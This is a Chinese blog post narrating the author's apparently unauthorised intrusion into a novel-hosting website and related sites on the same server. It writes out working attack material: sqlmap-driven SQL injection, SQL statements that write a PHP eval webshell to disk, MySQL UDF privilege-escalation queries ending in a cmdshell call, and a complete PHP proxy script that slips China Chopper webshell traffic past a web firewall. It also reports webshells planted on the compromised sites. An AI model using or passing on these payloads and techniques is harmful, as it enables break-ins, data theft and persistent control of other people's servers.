iverson5

权5小说站的渗透记录

0x0

文章是渗透完以后写的, 写的有些乱,凑合的着看吧,好多地方都没有去截图,此次渗透让我学会了不少的东西,求点基友qq 2802568527

0x1

今天才下班 基友丢过来一个网站,说是一个小说站 pr5 有注入,
网站地址http://www.abc.com
Pr5啊。还有注入 对于我这样的小菜来说,太激动了.

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

搜索框直接提交了个逗号,发现还真特么有注入,好吧 , 直接burp 抓包 放到sqlmap里面去跑的. 跑啊跑,终于 跑出了帐号密码为admin admin.  哈哈,这管理员真有意思 帐号密码竟然是 admin 呵呵,激动啊, (之后就煞笔了,)
好了 丢御剑 在加上谷歌 各种找后台 无果,
朋友说扫扫端口看看是不是有东西的,扫了一个端口 没有想到找到了phpmyadmin
通过注入点已经拿到了root的权限,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

我去 表还真不少 爱站去查了查 有不少的同ip网站,,心想这下shell能到手了吧,
看到他有个bbs的站点,看了看数据库是dz的裤,
爱站上看域名也确实有个bbs 点进去一看 ,我擦 管理啊,你这是挂羊头卖狗肉啊.
这哪里是个dz啊.明明就是个听说网啊, 坑爹啊.

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

之后 找到了个wordpress.还是这个站的二级域名,直接数据库改掉他的密码 上他的后台

后台找了半天没有找到404拿shell的页面 ,算了 去看看主题的.,听说主题那里可以拿shell的.

传了个模版出现了,  

哎 运气特太特么的差了竟然出现了 无法建立目录 wp-content/themes//2014/12。有没有

上级目录的写权限?

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

看来 wp的站点也拿不到shell的. 放弃吧, 看了下其余的站点 帝国cms也试了试,

认证码也全都不对,百度看了看需要修改” e/class/config.php”  我哪里会有权限呢,

还有一个是114啦的导航站,麻痹的 不知道管理怎么想的 把后台文件给修改的面目全非。

访问错误,所有的站,所有的数据库 都看完了

突然想到我一开始的时候爆出了绝对的路径的 看看可以不可以写shell的,

404 (Not Found) - 23 times, 500 (Internal Server Error) - 6 times

他妈的 404 竟然也写不进去的。算了去睡觉的 有时间在继续搞的。

没有能够拿到shell,连个后台也没有找到 没折了,暂时放弃.别的时候在继续搞吧,

0x2

既然我有phpmyadmin的root的权限,试试看可不可以进行phpmyadmin的方法来搞下shell呢,
说搞就搞的 先试试看能不能爆出目录的,网站找了一些个myadmin爆绝对路径的文章,
搞了半天也没有爆出绝对的路径,哎 - -开始烦躁了,乱点点看能不能有什么发现吧,
看到有个导入 点了一下 呵呵 爆出了一个绝对的路径,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

又可以继续搞了,看看可以不可以导出shell的
.
创建数据库create database 库名
  1. Drop TABLE IF EXISTS temp; //如果存在temp就删掉
  2. Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
  3. Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表
  4. Select cmd from temp into out file 'd:/wwwroot/1.php'; //查询temp表中的一句话并把结果导入到eval.php
  5. Drop TABLE IF EXISTS temp; //删除temp
复制代码
一开始到是挺顺利的 ,最后一步导出shell的 竟然没有权限,我列个擦, 麻蛋的 气死我了,
又没有办法了
开始百度找找其他的myadmin的文章 看到一个可以进行udf提权的,
过程:
查询
  1. select @@basedir  (或者 select @@datadir)
复制代码
得到MySQL目录 C:\MySql\
假如该目录不存在\lib\plugin目录,利用ADS创建
查询
  1. select 'xxx' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION';
复制代码
此时会报错
  1. ERROR 3 (HY000): Error writing file 'C:\MySQL\lib::$INDEX_ALLOCATION' (Errcode: 22)
复制代码
但是lib目录已经创建了
再查询
  1. select 'xxx' into dumpfile 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
复制代码

导出UDF.DLL
随便选一个库
  1. 查询 CREATE TABLE Temp_udf(udf BLOB);
  2. 查询 INSERT into Temp_udf values (CONVERT($shellcode,CHAR));   //$shellcode请用UDF用hex加密后的代码
  3. 查询 SELECT udf FROM Temp_udf INTO DUMPFILE 'C:\\MySQL\\lib\\plugin\\udf.dll';--
复制代码
注意:在后面记得要加 -- 否者会出错,我在此处浪费无限时间(>4h)
原因可能是PhpMyAdmin查询时会自动在语句末尾加上Limit 语句,导致出错

提权
  1. 查询 Create function cmdshell returns string soname 'udf.dll';  //此处不能填绝对路径 只能是dll名
  2. 查询 select * from mysql.func;                  //看看cmdshell function是否创立,创立就继续
  3. 查询 select cmdshell('net user');               //运行各种命令提权
复制代码

抱着不大的希望试了一下,哎,还是不行 开始的几步到是挺顺利的,最后一步的时候竟然提示了不能共享什么什么的,看着屏幕发呆半天,决定不搞了 睡觉去的,没搞头了,放弃了,

0x3

终于又有了时间继续搞了,拿出了了好几天的站发呆了半天还是没有任何的思路,算了 先去日日其他的站吧,在查询其他站流量的时候发现了一个新的思路,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

呵呵  拥有3个站点,抱着试一试的运气来看看他持有其他的域名吧,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

点开xxx.com 发现也是个小说站

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

在搜索框提交了个逗号 发现同样的存在注入

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

呵呵 心中窃喜,这不是和内个网站是一样一样的么,进行抓包 丢到sqlmap里面跑,
之后去看看他的phpmyadmin 和原来的端口一样不,
提交一看 哈哈, 竟然端口也是一样的, 省的我去扫了,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

同样的是8090的端口,sqlmap也同样的跑出了mysql的密码,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

去cmd5去解密的,, 不知道 cmd5抽什么疯 ,出错了 查询东西出现了 erro什么的,
换了一个网站去查也什么都查不到的.算了 一个一个的蒙蒙看的吧,
看看有没有什么帐号密码相同的. 没有想到还真的上去一个的.

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

我去 好多的裤子啊. 吓人啊..既然他什么地方都设置的一样,我想phpmyadmin里面也没有办法去拿shell的了,放弃了 ,看看同ip的站点吧,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

在里面发现了一个dede的站,,, 哈哈 dede的站漏洞很多的,
先来看看补丁信息的,
www.xxx.com/data/admin/ver.txt

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

2012年的补丁,拿个exp去试试的,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

我列个擦擦 被拦截了,  - - 这时候才特么的想到 自己有进了phpmyadmin了,(自己煞笔了).怎么不去直接修改他的密码呢,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

直接该了他的密码,竟然发现这个站点很有可能也是(小说站持有者的,妈的这么多的站 你赚钱赚老咯,)
通过mysql_error_trace.inc 得到后台为spQQMM 拿着帐号密码去登陆的,
拿shell就不在废话了 有百度云加速拦截, 利用了txt包含过不去
直接百度找了一篇过狗的文章直接过了的,

菜刀绕过

    测试发现这种一句话虽然可以成功执行,但是在菜刀里却不能用,而有些人非觉得这样的一句话麻烦,非要用菜刀。经分析安全狗对菜刀的HTTP请求做了拦截, 菜刀的POST数据里面对eval数据做了base64编码,安全狗也就依靠对这些特征来拦截,因此要想正常使用菜刀,必须在本地做一个转发,先把有特征 的数据转换。这个思路类似于对伪静态注入的本地转发。
    首先在本地搭建WEB SERVER,然后写一个php转发程序:
  1. <?php
  2. $target="http://192.168.200.115/small.php";//这个就是前面那个一句话的地址
  3. $poststr='';
  4. $i=0;
  5. foreach($_POST as $k=>$v)
  6. {
  7.   if(strstr($v, "base64_decode"))
  8.   {
  9.     $v=str_replace("base64_decode(","",$v);
  10.     $v=str_replace("))",")",$v);
  11.   }
  12.   else
  13.   {
  14.     if($k==="z0")
  15.       $v=base64_decode($v);
  16.   }
  17.   $pp=$k."=".urlencode($v);
  18.   //echo($pp);
  19.   if($i!=0)
  20.   {
  21.     $poststr=$poststr."&".$pp;
  22.   }
  23.   else
  24.   {  
  25.     $poststr=$pp;
  26.   }
  27.   $i=$i+1;
  28. }
  29. $ch = curl_init();
  30. $curl_url = $target."?".$_SERVER['QUERY_STRING'];
  31. curl_setopt($ch, CURLOPT_URL, $curl_url);
  32. curl_setopt($ch, CURLOPT_POST, 1);
  33. curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
  34. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  35. $result = curl_exec($ch);
  36. curl_close($ch);
  37. echo $result;
  38. ?>
复制代码
意思就是在本地先对eval数据进行base64解码,然后再POST到目标机器上去。在菜刀里设置URL为本地转发php脚本:

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

这样就可以使用菜刀来连接前面那个一句话马了:

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

得到shell http://www.123.cn/plus/small.php访问一下不被杀了

本地直接连接菜刀http://127.0.0.1/xx.php?a=assert

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

呵呵呵 ,成功的连接上了 找到我门的目标站 xxx.com,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

一看这目录 身为小菜的我当下就蒙b了 - - 就想上个大马看看的吧, 找了半天终于找到了一个地方放了一个大马的.
大马地址: http://www.123.com/bookimg/201409/NB.php
开始蛋疼的翻目录,发现他有个fck的编辑器 ,拿这个目录去我门的目标站看看的,
一访问 还特么的真有fck的编辑器,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

试试看能不能上传的吧.  Asp 和aspx 都是405  php 也不能上传

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

一大片的英文 我也不懂,算了 继续找目录的吧, 找了半天也没有找到东西,看看表又特么的11点了 在找半个小时找不到就特么的不搞了,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

终于看到了个有希望的目录了, 一个一个点开看了看.发现manager下面有个logo.php

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

拿了目录去访问了下, http://www.123. com//app/view/manager/login.php  他妈的竟然是个空白 我擦 , 难道这也不对的么, 去看看源码的 到底是个神马情况的,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

看到源码里面有个"/index.php?r=manager/login"  直接访问这个试试看的,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

呵呵呵 没有 想到竟然真的是我想要的后台, 赶紧拿着这个连接去pr5的站试试的,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

没想到啊,竟然也可以访问的, 赶紧去数据库 拿个帐号密码的,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

哈哈,进去了 激动的很啊,  拿shell 真心没有想到是那么的简单的,直接写个php文件就能拿到的,
得到shell的地址为http://image.123.com//UpLoadFiles/Book/BookImg/201412/1418148495.php
赶紧的操起菜刀去连的,哈哈 还真的连接上去了

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

发现他的这个站点就只是存放图片的 还不是我想要的pr 5的站点. 直接去pr5的站点放个马去的. 找了个 777的权限目录 直接写个一句话的,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

得到地址http://www.123.com/sitemap/1.php
丢菜刀去连的. 完全没有问题可以连接,

权5小说站的渗透记录 - IversOn5 - IversOn5 blog

文章就到此了,提权什么的就不搞了~
评论

iverson5

© iverson5 | Powered by LOFTER